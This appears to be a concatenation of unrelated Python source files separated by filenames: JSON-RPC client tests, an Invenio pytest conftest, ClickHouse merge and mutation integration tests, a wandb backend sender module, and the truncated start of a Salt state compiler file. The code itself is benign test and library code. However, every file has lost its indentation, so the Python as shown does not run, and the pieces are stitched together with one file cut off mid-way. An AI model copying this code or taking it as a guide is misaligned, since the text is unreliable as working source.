{"jsonrpc": "2.0", "error": {"code": -32601, "message": "Method not found."}, "id": "5"},
{"jsonrpc": "2.0", "result": ["hello", 5], "id": "9"}
]""")
self.assertTrue(len(requests) == len(verify_requests))
self.assertTrue(len(responses) == len(verify_responses))
responses_by_id = {}
response_i = 0
for i in range(len(requests)):
verify_request = verify_requests[i]
request = requests[i]
response = None
if request.get('method') != 'notify_hello':
req_id = request.get('id')
if verify_request.has_key('id'):
verify_request['id'] = req_id
verify_response = verify_responses[response_i]
verify_response['id'] = req_id
responses_by_id[req_id] = verify_response
response_i += 1
response = verify_response
self.assertTrue(request == verify_request)
for response in responses:
verify_response = responses_by_id.get(response.get('id'))
if verify_response.has_key('error'):
verify_response['error']['message'] = \
response['error']['message']
self.assertTrue(response == verify_response)
def test_batch_notifications(self):
multicall = CLIENT._batch()
multicall._notification.notify_sum(1, 2, 4)
multicall._notification.notify_hello(7)
results = multicall()
result_list = []
for result in results:
result_list.append(result)
self.assertTrue(len(result_list) == 0)
valid_request = json.loads(
'[{"jsonrpc": "2.0", "method": "notify_sum", '+
'"params": [1,2,4]},{"jsonrpc": "2.0", '+
'"method": "notify_hello", "params": [7]}]'
)
request = json.loads(history.request)
self.assertTrue(len(request) == len(valid_request))
for i in range(len(request)):
req = request[i]
valid_req = valid_request[i]
self.assertTrue(req == valid_req)
self.assertTrue(history.response == '')
# Other tests
def test_namespace(self):
response = CLIENT.namespace.sum(1,2,4)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "params": [1, 2, 4],
"id": "5", "method": "namespace.sum"
}
verify_response = {
"jsonrpc": "2.0", "result": 7, "id": "5"
}
verify_request['id'] = request['id']
verify_response['id'] = request['id']
self.assertTrue(verify_request == request)
self.assertTrue(verify_response == response)
class TestEncryption(unittest.TestCase):
def setUp(self):
config.secret = '12345abcdef67890'
def test_no_encryption(self):
crypt = config.crypt
config.crypt = None
self.assertRaises(
EncryptionMissing, connect, 'localhost', 8001, config.secret
)
config.crypt = crypt
def test_encryption(self):
client = connect('localhost', 8001, config.secret)
result = client.sum(49, 51)
self.assertTrue(result == 100)
def tearDown(self):
config.secret = None
""" Test Methods """
def subtract(minuend, subtrahend):
""" Using the keywords from the JSON-RPC v2 doc """
return minuend-subtrahend
def update(*args):
return args
def summation(*args):
return sum(args)
def notify_hello(*args):
return args
def get_data():
return ['hello', 5]
def test_set_up():
# Because 'setUp' on unittests are called multiple times
# and starting a server each time is inefficient / a headache
# Starting normal server
server = Server(('', 8000))
server.add_handler(summation, 'sum')
server.add_handler(summation, 'notify_sum')
server.add_handler(notify_hello)
server.add_handler(subtract)
server.add_handler(update)
server.add_handler(get_data)
server.add_handler(summation, 'namespace.sum')
server_proc = Thread(target=server.serve)
server_proc.daemon = True
server_proc.start()
#Starting secure server
server2 = Server(('', 8001))
server2.add_handler(summation, 'sum')
server_proc2 = Thread(target=server2.serve)
server_proc2.daemon = True
server_proc2.start()
time.sleep(1) # give it time to start up
#logger.setLevel(logging.DEBUG)
#logger.addHandler(logging.StreamHandler())
if __name__ == '__main__':
test_set_up()
unittest.main()
|
conftest.py
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Pytest configuration."""
import multiprocessing
import os
import shutil
import tempfile
import time
import pytest
from flask import Flask
from flask_babelex import Babel
from flask_mail import Mail
from flask_menu import Menu
from invenio_db import InvenioDB, db
from selenium import webdriver
from sqlalchemy_utils.functions import create_database, database_exists, \
drop_database
from invenio_accounts import InvenioAccounts
from invenio_accounts.views.settings import blueprint
@pytest.fixture(scope='session')
def app(request):
"""Flask application fixture for E2E/integration/selenium tests.
Overrides the `app` fixture found in `../conftest.py`. Tests/files in this
folder and subfolders will see this variant of the `app` fixture.
"""
instance_path = tempfile.mkdtemp()
app = Flask('testapp', instance_path=instance_path)
app.config.update(
ACCOUNTS_USE_CELERY=False,
CELERY_ALWAYS_EAGER=True,
CELERY_CACHE_BACKEND="memory",
CELERY_EAGER_PROPAGATES_EXCEPTIONS=True,
CELERY_RESULT_BACKEND="cache",
LOGIN_DISABLED=False,
MAIL_SUPPRESS_SEND=True,
SECRET_KEY="CHANGE_ME",
SECURITY_PASSWORD_SALT="CHANGE_ME_ALSO",
SQLALCHEMY_DATABASE_URI=os.environ.get(
'SQLALCHEMY_DATABASE_URI', 'sqlite:///test.db'),
TESTING=True,
)
Menu(app)
Babel(app)
Mail(app)
InvenioDB(app)
InvenioAccounts(app)
app.register_blueprint(blueprint)
with app.app_context():
if not database_exists(str(db.engine.url)):
create_database(str(db.engine.url))
db.create_all()
def teardown():
with app.app_context():
drop_database(str(db.engine.url))
shutil.rmtree(instance_path)
request.addfinalizer(teardown)
return app
def pytest_generate_tests(metafunc):
"""Override pytest's default test collection function.
For each test in this directory which uses the `env_browser` fixture, said
test is called once for each value found in the `E2E_WEBDRIVER_BROWSERS`
environment variable.
"""
browsers = os.environ.get('E2E_WEBDRIVER_BROWSERS', '').split()
if not browsers:
pytest.skip('E2E_WEBDRIVER_BROWSERS not set, '
'end-to-end tests skipped.')
if 'env_browser' in metafunc.fixturenames:
# In Python 2.7 the fallback kwarg of os.environ.get is `failobj`,
# in 3.x it's `default`.
metafunc.parametrize('env_browser', browsers, indirect=True)
@pytest.fixture()
def env_browser(request):
"""Create a webdriver instance of the browser specified by request.
The default browser is Firefox. The webdriver instance is killed after the
number of seconds specified by the ``E2E_WEBDRIVER_TIMEOUT`` variable or
defaults to 300 (five minutes).
"""
timeout = int(os.environ.get('E2E_WEBDRIVER_TIMEOUT', 300))
def wait_kill():
time.sleep(timeout)
browser.quit()
def finalizer():
browser.quit()
timeout_process.terminate()
timeout_process = multiprocessing.Process(target=wait_kill)
# Create instance of webdriver.`request.param`()
browser = getattr(webdriver, request.param)()
# Add finalizer to quit the webdriver instance
request.addfinalizer(finalizer)
timeout_process.start()
return browser
|
test.py
|
import pytest
import threading
import time
from helpers.cluster import ClickHouseCluster
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def split_tsv(data):
return [ x.split("\t") for x in data.splitlines() ]
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_merge_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
name = "test_merge_simple"
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_merge_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY sleep(2)
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
node1.query("INSERT INTO {name} VALUES (2)".format(name=name))
node1.query("INSERT INTO {name} VALUES (3)".format(name=name))
parts = ["all_{}_{}_0".format(x, x) for x in range(starting_block, starting_block+3)]
result_part = "all_{}_{}_1".format(starting_block, starting_block+2)
def optimize():
node1.query("OPTIMIZE TABLE {name}".format(name=name))
wait = threading.Thread(target=time.sleep, args=(5,))
wait.start()
t = threading.Thread(target=optimize)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=name))) == [
[
"default",
name,
"3",
"['{}','{}','{}']".format(*parts),
"['{clickhouse}/data/default/{name}/{}/','{clickhouse}/data/default/{name}/{}/','{clickhouse}/data/default/{name}/{}/']".format(*parts, clickhouse=clickhouse_path, name=name),
result_part,
"{clickhouse}/data/default/{name}/{}/".format(result_part, clickhouse=clickhouse_path, name=name),
"all",
"0"
]
]
t.join()
wait.join()
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_mutation_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
name = "test_mutation_simple"
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_mutation_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY tuple()
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
part = "all_{}_{}_0".format(starting_block, starting_block)
result_part = "all_{}_{}_0_{}".format(starting_block, starting_block, starting_block+1)
def alter():
node1.query("ALTER TABLE {name} UPDATE a = 42 WHERE sleep(2) OR 1".format(name=name))
t = threading.Thread(target=alter)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=name))) == [
[
"default",
name,
"1",
"['{}']".format(part),
"['{clickhouse}/data/default/{name}/{}/']".format(part, clickhouse=clickhouse_path, name=name),
result_part,
"{clickhouse}/data/default/{name}/{}/".format(result_part, clickhouse=clickhouse_path, name=name),
"all",
"1"
],
]
t.join()
time.sleep(1.5)
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
|
interface.py
|
#
# -*- coding: utf-8 -*-
"""Backend Sender - Send to internal process
Manage backend sender.
"""
import json
import logging
import threading
import uuid
import six
from six.moves import queue
import wandb
from wandb import data_types
from wandb.proto import wandb_internal_pb2 as pb
from wandb.proto import wandb_telemetry_pb2 as tpb
from wandb.util import (
get_h5_typename,
json_dumps_safer,
json_dumps_safer_history,
json_friendly,
json_friendly_val,
maybe_compress_summary,
WandBJSONEncoderOld,
)
from .artifacts import ArtifactManifest
from ..wandb_artifacts import Artifact
if wandb.TYPE_CHECKING:
import typing as t
from . import summary_record as sr
from typing import Any, Dict, Iterable, Optional, Tuple, Union
from multiprocessing import Process
from typing import cast
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from ..wandb_run import Run
from six.moves.queue import Queue
else:
def cast(_, val):
return val
logger = logging.getLogger("wandb")
def file_policy_to_enum(policy: str) -> "pb.FilesItem.PolicyTypeValue":
if policy == "now":
enum = pb.FilesItem.PolicyType.NOW
elif policy == "end":
enum = pb.FilesItem.PolicyType.END
elif policy == "live":
enum = pb.FilesItem.PolicyType.LIVE
return enum
def file_enum_to_policy(enum: "pb.FilesItem.PolicyTypeValue") -> str:
if enum == pb.FilesItem.PolicyType.NOW:
policy = "now"
elif enum == pb.FilesItem.PolicyType.END:
policy = "end"
elif enum == pb.FilesItem.PolicyType.LIVE:
policy = "live"
return policy
class _Future(object):
_object: Optional[pb.Result]
def __init__(self) -> None:
self._object = None
self._object_ready = threading.Event()
self._lock = threading.Lock()
def get(self, timeout: int = None) -> Optional[pb.Result]:
is_set = self._object_ready.wait(timeout)
if is_set and self._object:
return self._object
return None
def _set_object(self, obj: pb.Result) -> None:
self._object = obj
self._object_ready.set()
class MessageRouter(object):
_pending_reqs: Dict[str, _Future]
_request_queue: "Queue[pb.Record]"
_response_queue: "Queue[pb.Result]"
def __init__(
self, request_queue: "Queue[pb.Record]", response_queue: "Queue[pb.Result]"
) -> None:
self._request_queue = request_queue
self._response_queue = response_queue
self._pending_reqs = {}
self._lock = threading.Lock()
self._join_event = threading.Event()
self._thread = threading.Thread(target=self.message_loop)
self._thread.daemon = True
self._thread.start()
def message_loop(self) -> None:
while not self._join_event.is_set():
try:
msg = self._response_queue.get(timeout=1)
except queue.Empty:
continue
self._handle_msg_rcv(msg)
def send_and_receive(self, rec: pb.Record, local: Optional[bool] = None) -> _Future:
rec.control.req_resp = True
if local:
rec.control.local = local
rec.uuid = uuid.uuid4().hex
future = _Future()
with self._lock:
self._pending_reqs[rec.uuid] = future
self._request_queue.put(rec)
return future
def join(self) -> None:
self._join_event.set()
self._thread.join()
def _handle_msg_rcv(self, msg: pb.Result) -> None:
with self._lock:
future = self._pending_reqs.pop(msg.uuid, None)
if future is None:
# TODO (cvp): saw this in tests, seemed benign enough to ignore, but
# could point to other issues.
if msg.uuid != "":
logger.warning(
"No listener found for msg with uuid %s (%s)", msg.uuid, msg
)
return
future._set_object(msg)
class BackendSender(object):
class ExceptionTimeout(Exception):
pass
record_q: Optional["Queue[pb.Record]"]
result_q: Optional["Queue[pb.Result]"]
process: Optional[Process]
_run: Optional["Run"]
_router: Optional[MessageRouter]
def __init__(
self,
record_q: "Queue[pb.Record]" = None,
result_q: "Queue[pb.Result]" = None,
process: Process = None,
) -> None:
self.record_q = record_q
self.result_q = result_q
self._process = process
self._run = None
self._router = None
if record_q and result_q:
self._router = MessageRouter(record_q, result_q)
def _hack_set_run(self, run: "Run") -> None:
self._run = run
def publish_output(self, name: str, data: str) -> None:
# from vendor.protobuf import google3.protobuf.timestamp
# ts = timestamp.Timestamp()
# ts.GetCurrentTime()
# now = datetime.now()
if name == "stdout":
otype = pb.OutputRecord.OutputType.STDOUT
elif name == "stderr":
otype = pb.OutputRecord.OutputType.STDERR
else:
# TODO(jhr): throw error?
print("unknown type")
o = pb.OutputRecord(output_type=otype, line=data)
o.timestamp.GetCurrentTime()
self._publish_output(o)
def _publish_output(self, outdata: pb.OutputRecord) -> None:
rec = pb.Record()
rec.output.CopyFrom(outdata)
self._publish(rec)
def publish_tbdata(
self, log_dir: str, save: bool, root_logdir: Optional[str]
) -> None:
tbrecord = pb.TBRecord()
tbrecord.log_dir = log_dir
tbrecord.save = save
tbrecord.root_dir = root_logdir or ""
rec = self._make_record(tbrecord=tbrecord)
self._publish(rec)
def _publish_history(self, history: pb.HistoryRecord) -> None:
rec = self._make_record(history=history)
self._publish(rec)
def publish_history(
self, data: dict, step: int = None, run: "Run" = None, publish_step: bool = True
) -> None:
run = run or self._run
data = data_types.history_dict_to_json(run, data, step=step)
history = pb.HistoryRecord()
if publish_step:
assert step is not None
history.step.num = step
data.pop("_step", None)
for k, v in six.iteritems(data):
item = history.item.add()
item.key = k
item.value_json = json_dumps_safer_history(v) # type: ignore
self._publish_history(history)
def publish_telemetry(self, telem: tpb.TelemetryRecord) -> None:
rec = self._make_record(telemetry=telem)
self._publish(rec)
def _make_run(self, run: "Run") -> pb.RunRecord:
proto_run = pb.RunRecord()
run._make_proto_run(proto_run)
if run._settings.host:
proto_run.host = run._settings.host
if run._config is not None:
config_dict = run._config._as_dict() # type: ignore
self._make_config(data=config_dict, obj=proto_run.config)
if run._telemetry_obj:
proto_run.telemetry.MergeFrom(run._telemetry_obj)
return proto_run
def _make_artifact(self, artifact: Artifact) -> pb.ArtifactRecord:
proto_artifact = pb.ArtifactRecord()
proto_artifact.type = artifact.type
proto_artifact.name = artifact.name
proto_artifact.digest = artifact.digest
if artifact.distributed_id:
proto_artifact.distributed_id = artifact.distributed_id
if artifact.description:
proto_artifact.description = artifact.description
if artifact.metadata:
proto_artifact.metadata = json.dumps(json_friendly_val(artifact.metadata)) # type: ignore
proto_artifact.incremental_beta1 = artifact.incremental
self._make_artifact_manifest(artifact.manifest, obj=proto_artifact.manifest)
return proto_artifact
def _make_artifact_manifest(
self, artifact_manifest: ArtifactManifest, obj: pb.ArtifactManifest = None
) -> pb.ArtifactManifest:
proto_manifest = obj or pb.ArtifactManifest()
proto_manifest.version = artifact_manifest.version() # type: ignore
proto_manifest.storage_policy = artifact_manifest.storage_policy.name()
for k, v in artifact_manifest.storage_policy.config().items() or {}.items():
cfg = proto_manifest.storage_policy_config.add()
cfg.key = k
cfg.value_json = json.dumps(v)
for entry in sorted(artifact_manifest.entries.values(), key=lambda k: k.path): # type: ignore
proto_entry = proto_manifest.contents.add()
proto_entry.path = entry.path
proto_entry.digest = entry.digest
if entry.size:
proto_entry.size = entry.size
if entry.birth_artifact_id:
proto_entry.birth_artifact_id = entry.birth_artifact_id
if entry.ref:
proto_entry.ref = entry.ref
if entry.local_path:
proto_entry.local_path = entry.local_path
for k, v in entry.extra.items():
proto_extra = proto_entry.extra.add()
proto_extra.key = k
proto_extra.value_json = json.dumps(v)
return proto_manifest
def _make_exit(self, exit_code: int) -> pb.RunExitRecord:
exit = pb.RunExitRecord()
exit.exit_code = exit_code
return exit
def _make_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
obj: pb.ConfigRecord = None,
) -> pb.ConfigRecord:
config = obj or pb.ConfigRecord()
if data:
for k, v in six.iteritems(data):
update = config.update.add()
update.key = k
update.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
if key:
update = config.update.add()
if isinstance(key, tuple):
for k in key:
update.nested_key.append(k)
else:
update.key = key
update.value_json = json_dumps_safer(json_friendly(val)[0]) # type: ignore
return config
def _make_stats(self, stats_dict: dict) -> pb.StatsRecord:
stats = pb.StatsRecord()
stats.stats_type = pb.StatsRecord.StatsType.SYSTEM
stats.timestamp.GetCurrentTime()
for k, v in six.iteritems(stats_dict):
item = stats.item.add()
item.key = k
item.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
return stats
def _summary_encode(self, value: t.Any, path_from_root: str) -> dict:
"""Normalize, compress, and encode sub-objects for backend storage.
value: Object to encode.
path_from_root: `str` dot separated string from the top-level summary to the
current `value`.
Returns:
A new tree of dict's with large objects replaced with dictionaries
with "_type" entries that say which type the original data was.
"""
# Constructs a new `dict` tree in `json_value` that discards and/or
# encodes objects that aren't JSON serializable.
if isinstance(value, dict):
json_value = {}
for key, value in six.iteritems(value):
json_value[key] = self._summary_encode(
value, path_from_root + "." + key
)
return json_value
else:
friendly_value, converted = json_friendly( # type: ignore
data_types.val_to_json(
self._run, path_from_root, value, namespace="summary"
)
)
json_value, compressed = maybe_compress_summary( # type: ignore
friendly_value, get_h5_typename(value) # type: ignore
)
if compressed:
# TODO(jhr): impleement me
pass
# self.write_h5(path_from_root, friendly_value)
return json_value
def _make_summary_from_dict(self, summary_dict: dict) -> pb.SummaryRecord:
summary = pb.SummaryRecord()
for k, v in six.iteritems(summary_dict):
update = summary.update.add()
update.key = k
update.value_json = json.dumps(v)
return summary
def _make_summary(self, summary_record: sr.SummaryRecord) -> pb.SummaryRecord:
pb_summary_record = pb.SummaryRecord()
for item in summary_record.update:
pb_summary_item = pb_summary_record.update.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
path_from_root = ".".join(item.key)
json_value = self._summary_encode(item.value, path_from_root)
json_value, _ = json_friendly(json_value) # type: ignore
pb_summary_item.value_json = json.dumps(
json_value, cls=WandBJSONEncoderOld,
)
for item in summary_record.remove:
pb_summary_item = pb_summary_record.remove.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
return pb_summary_record
def _make_files(self, files_dict: dict) -> pb.FilesRecord:
files = pb.FilesRecord()
for path, policy in files_dict["files"]:
f = files.files.add()
f.path = path
f.policy = file_policy_to_enum(policy)
return files
def _make_login(self, api_key: str = None) -> pb.LoginRequest:
login = pb.LoginRequest()
if api_key:
login.api_key = api_key
return login
def _make_request(
self,
login: pb.LoginRequest = None,
get_summary: pb.GetSummaryRequest = None,
pause: pb.PauseRequest = None,
resume: pb.ResumeRequest = None,
stop_status: pb.StopStatusRequest = None,
network_status: pb.NetworkStatusRequest = None,
poll_exit: pb.PollExitRequest = None,
sampled_history: pb.SampledHistoryRequest = None,
run_start: pb.RunStartRequest = None,
check_version: pb.CheckVersionRequest = None,
log_artifact: pb.LogArtifactRequest = None,
defer: pb.DeferRequest = None,
) -> pb.Record:
request = pb.Request()
if login:
request.login.CopyFrom(login)
elif get_summary:
request.get_summary.CopyFrom(get_summary)
elif pause:
request.pause.CopyFrom(pause)
elif resume:
request.resume.CopyFrom(resume)
elif stop_status:
request.stop_status.CopyFrom(stop_status)
elif network_status:
request.network_status.CopyFrom(network_status)
elif poll_exit:
request.poll_exit.CopyFrom(poll_exit)
elif sampled_history:
request.sampled_history.CopyFrom(sampled_history)
elif run_start:
request.run_start.CopyFrom(run_start)
elif check_version:
request.check_version.CopyFrom(check_version)
elif log_artifact:
request.log_artifact.CopyFrom(log_artifact)
elif defer:
request.defer.CopyFrom(defer)
else:
raise Exception("Invalid request")
record = self._make_record(request=request)
# All requests do not get persisted
record.control.local = True
return record
def _make_record(
self,
run: pb.RunRecord = None,
config: pb.ConfigRecord = None,
files: pb.FilesRecord = None,
summary: pb.SummaryRecord = None,
history: pb.HistoryRecord = None,
stats: pb.StatsRecord = None,
exit: pb.RunExitRecord = None,
artifact: pb.ArtifactRecord = None,
tbrecord: pb.TBRecord = None,
alert: pb.AlertRecord = None,
final: pb.FinalRecord = None,
metric: pb.MetricRecord = None,
header: pb.HeaderRecord = None,
footer: pb.FooterRecord = None,
request: pb.Request = None,
telemetry: tpb.TelemetryRecord = None,
) -> pb.Record:
record = pb.Record()
if run:
record.run.CopyFrom(run)
elif config:
record.config.CopyFrom(config)
elif summary:
record.summary.CopyFrom(summary)
elif history:
record.history.CopyFrom(history)
elif files:
record.files.CopyFrom(files)
elif stats:
record.stats.CopyFrom(stats)
elif exit:
record.exit.CopyFrom(exit)
elif artifact:
record.artifact.CopyFrom(artifact)
elif tbrecord:
record.tbrecord.CopyFrom(tbrecord)
elif alert:
record.alert.CopyFrom(alert)
elif final:
record.final.CopyFrom(final)
elif header:
record.header.CopyFrom(header)
elif footer:
record.footer.CopyFrom(footer)
elif request:
record.request.CopyFrom(request)
elif telemetry:
record.telemetry.CopyFrom(telemetry)
elif metric:
record.metric.CopyFrom(metric)
else:
raise Exception("Invalid record")
return record
def _publish(self, record: pb.Record, local: bool = None) -> None:
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
if local:
record.control.local = local
if self.record_q:
self.record_q.put(record)
def _communicate(
self, rec: pb.Record, timeout: Optional[int] = 5, local: bool = None
) -> Optional[pb.Result]:
return self._communicate_async(rec, local=local).get(timeout=timeout)
def _communicate_async(self, rec: pb.Record, local: bool = None) -> _Future:
assert self._router
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
future = self._router.send_and_receive(rec, local=local)
return future
def communicate_login(
self, api_key: str = None, timeout: Optional[int] = 15
) -> pb.LoginResponse:
login = self._make_login(api_key)
rec = self._make_request(login=login)
result = self._communicate(rec, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
login_response = result.response.login_response
assert login_response
return login_response
def _publish_defer(self, state: "pb.DeferRequest.DeferStateValue") -> None:
defer = pb.DeferRequest(state=state)
rec = self._make_request(defer=defer)
self._publish(rec, local=True)
def publish_defer(self, state: int = 0) -> None:
self._publish_defer(cast("pb.DeferRequest.DeferStateValue", state))
def publish_header(self) -> None:
header = pb.HeaderRecord()
rec = self._make_record(header=header)
self._publish(rec)
def publish_footer(self) -> None:
footer = pb.FooterRecord()
rec = self._make_record(footer=footer)
self._publish(rec)
def publish_final(self) -> None:
final = pb.FinalRecord()
rec = self._make_record(final=final)
self._publish(rec)
def publish_login(self, api_key: str = None) -> None:
login = self._make_login(api_key)
rec = self._make_request(login=login)
self._publish(rec)
def publish_pause(self) -> None:
pause = pb.PauseRequest()
rec = self._make_request(pause=pause)
self._publish(rec)
def publish_resume(self) -> None:
resume = pb.ResumeRequest()
rec = self._make_request(resume=resume)
self._publish(rec)
def _publish_run(self, run: pb.RunRecord) -> None:
rec = self._make_record(run=run)
self._publish(rec)
def publish_run(self, run_obj: "Run") -> None:
run = self._make_run(run_obj)
self._publish_run(run)
def publish_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
) -> None:
cfg = self._make_config(data=data, key=key, val=val)
self._publish_config(cfg)
def _publish_config(self, cfg: pb.ConfigRecord) -> None:
rec = self._make_record(config=cfg)
self._publish(rec)
def publish_summary(self, summary_record: sr.SummaryRecord) -> None:
pb_summary_record = self._make_summary(summary_record)
self._publish_summary(pb_summary_record)
def _publish_summary(self, summary: pb.SummaryRecord) -> None:
rec = self._make_record(summary=summary)
self._publish(rec)
def _publish_metric(self, metric: pb.MetricRecord) -> None:
rec = self._make_record(metric=metric)
self._publish(rec)
def _communicate_run(
self, run: pb.RunRecord, timeout: int = None
) -> Optional[pb.RunUpdateResult]:
"""Send synchronous run object waiting for a response.
Arguments:
run: RunRecord object
timeout: number of seconds to wait
Returns:
RunRecord object
"""
req = self._make_record(run=run)
resp = self._communicate(req, timeout=timeout)
if resp is None:
logger.info("couldn't get run from backend")
# Note: timeouts handled by callers: wandb_init.py
return None
assert resp.HasField("run_result")
return resp.run_result
def communicate_run(
self, run_obj: "Run", timeout: int = None
) -> Optional[pb.RunUpdateResult]:
run = self._make_run(run_obj)
return self._communicate_run(run, timeout=timeout)
def publish_stats(self, stats_dict: dict) -> None:
stats = self._make_stats(stats_dict)
rec = self._make_record(stats=stats)
self._publish(rec)
def publish_files(self, files_dict: dict) -> None:
files = self._make_files(files_dict)
rec = self._make_record(files=files)
self._publish(rec)
def communicate_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> _Future:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
log_artifact = pb.LogArtifactRequest()
log_artifact.artifact.CopyFrom(proto_artifact)
rec = self._make_request(log_artifact=log_artifact)
return self._communicate_async(rec)
def publish_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> None:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
rec = self._make_record(artifact=proto_artifact)
self._publish(rec)
def publish_alert(
self, title: str, text: str, level: str, wait_duration: int
) -> None:
proto_alert = pb.AlertRecord()
proto_alert.title = title
proto_alert.text = text
proto_alert.level = level
proto_alert.wait_duration = wait_duration
rec = self._make_record(alert=proto_alert)
self._publish(rec)
def communicate_stop_status(
self, timeout: int = None
) -> Optional[pb.StopStatusResponse]:
status = pb.StopStatusRequest()
req = self._make_request(stop_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.stop_status_response
return resp.response.stop_status_response
def communicate_network_status(
self, timeout: int = None
) -> Optional[pb.NetworkStatusResponse]:
status = pb.NetworkStatusRequest()
req = self._make_request(network_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.network_status_response
return resp.response.network_status_response
def publish_exit(self, exit_code: int) -> None:
exit_data = self._make_exit(exit_code)
rec = self._make_record(exit=exit_data)
self._publish(rec)
def _communicate_exit(
self, exit_data: pb.RunExitRecord, timeout: int = None
) -> pb.RunExitResult:
req = self._make_record(exit=exit_data)
result = self._communicate(req, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
assert result.exit_result
return result.exit_result
def communicate_poll_exit(self) -> Optional[pb.PollExitResponse]:
poll_request = pb.PollExitRequest()
rec = self._make_request(poll_exit=poll_request)
result = self._communicate(rec)
if result is None:
return None
poll_exit_response = result.response.poll_exit_response
assert poll_exit_response
return poll_exit_response
def communicate_check_version(
self, current_version: str = None
) -> Optional[pb.CheckVersionResponse]:
check_version = pb.CheckVersionRequest()
if current_version:
check_version.current_version = current_version
rec = self._make_request(check_version=check_version)
result = self._communicate(rec)
if result is None:
# Note: timeouts handled by callers: wandb_init.py
return None
return result.response.check_version_response
def communicate_run_start(self, run_pb: pb.RunRecord) -> Optional[pb.Result]:
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(run_pb)
rec = self._make_request(run_start=run_start)
result = self._communicate(rec)
return result
def communicate_exit(self, exit_code: int, timeout: int = None) -> pb.RunExitResult:
exit_data = self._make_exit(exit_code)
return self._communicate_exit(exit_data, timeout=timeout)
def communicate_summary(self) -> Optional[pb.GetSummaryResponse]:
record = self._make_request(get_summary=pb.GetSummaryRequest())
result = self._communicate(record, timeout=10)
if result is None:
return None
get_summary_response = result.response.get_summary_response
assert get_summary_response
return get_summary_response
def communicate_sampled_history(self) -> Optional[pb.SampledHistoryResponse]:
record = self._make_request(sampled_history=pb.SampledHistoryRequest())
result = self._communicate(record)
if result is None:
return None
sampled_history_response = result.response.sampled_history_response
assert sampled_history_response
return sampled_history_response
def join(self) -> None:
# shutdown
request = pb.Request(shutdown=pb.ShutdownRequest())
record = self._make_record(request=request)
_ = self._communicate(record)
if self._router:
self._router.join()
|
state.py
|
"""
The State Compiler is used to execute states in Salt. A state is unlike
